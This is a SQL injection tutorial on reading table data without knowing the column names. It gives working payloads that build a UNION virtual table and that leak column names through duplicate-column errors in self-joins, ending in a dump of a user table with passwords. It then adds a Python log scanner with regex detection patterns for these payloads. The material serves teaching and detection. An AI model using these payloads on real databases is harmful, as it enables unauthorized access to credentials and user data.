Web Security -- SQL Injection -- Injection Without Column Names
1. Principle:
When we know only the table name but not the column names, we can still read the data: either build a virtual table with a UNION query, which gives the columns positional names we can reference, or use the join and using keywords to make the database leak the real column names through its duplicate-column error.
2. Exploitation methods:
2.1) Querying through a virtual table:
# Create the virtual table (the number of constants must match the table's column count; user has three columns here)
select 1,2,3 union select * from user;
# Query the second column
select `2` from (select 1,2,3 union select * from user)xxx;
When the backtick ` is filtered, the columns can be given plain aliases instead and queried like this:
select b from (select 1 as a,2 as b,3 as c union select * from user)xxx;
2.2) Leaking column names with join + using:
# Duplicate column name error reveals the id column
select * from user where id='1' union all select * from (select * from user as a join user as b)as c;
# Duplicate column name error reveals the username column
select * from user where id='1' union all select * from (select * from user as a join user as b using(id))as c;
# Duplicate column name error reveals the password column
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username))as c;
# All columns are now listed in using(), so the query returns the data of the user table
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username,password))as c;
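As an added defensive example (not part of the original page), the following Python scans constructed log lines in the shape of a MySQL general query log for the signatures of the statements above: a UNION with a row of constants, a derived table built from constants, a table joined to itself, and join ... using(...). The log format and the regexes are my own assumptions, not rules from any real WAF or product.

```python
import re

# Heuristic signatures for the column-name-less injection patterns shown above.
# Constructed for log review; they are assumptions, not rules from a real product.
SIGNATURES = [
    # a row of numeric constants UNIONed with "select *": the virtual-table trick
    ("union_constant_row",
     re.compile(r"\bselect\s+\d+(?:\s*,\s*\d+)+\s+union\s+(?:all\s+)?select\s+\*", re.I)),
    # derived table whose first column is a constant: "(select 1,2,3" or "(select 1 as a"
    ("derived_table_of_constants",
     re.compile(r"\bfrom\s*\(\s*select\s+\d+\s*(?:,|\bas\b)", re.I)),
    # a table joined to itself: every column appears twice, which triggers the duplicate-column error
    ("self_join",
     re.compile(r"\bfrom\s+(\w+)\s+(?:as\s+)?\w+\s+join\s+\1\b", re.I)),
    # join ... using(...) lists the columns that have already been leaked
    ("join_using",
     re.compile(r"\bjoin\s+\w+(?:\s+as\s+\w+)?\s+using\s*\(", re.I)),
]


def classify(statement):
    """Return the names of all signatures that match one SQL statement."""
    return [name for name, rx in SIGNATURES if rx.search(statement)]


def scan_log(lines):
    """Return (line_no, matched signature names) for every line that trips at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits.append((n, found))
    return hits


# Constructed sample in the shape of a MySQL general query log: two benign lines, three from this page.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z   12 Query  select * from user where id='1'",
    "2024-05-01T10:00:01Z   12 Query  select * from user where id='1' union all select * from (select * from user as a join user as b)as c",
    "2024-05-01T10:00:02Z   12 Query  select `2` from (select 1,2,3 union select * from user)xxx",
    "2024-05-01T10:00:03Z   13 Query  select name from (select id, name from user) t where id = 5",
    "2024-05-01T10:00:04Z   12 Query  select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username))as c",
]

if __name__ == "__main__":
    for line_no, names in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(names)}")
```

Rules like these only flag the pattern after the fact; what removes the bug is a parameterized query, so that the id value can never become part of the statement text.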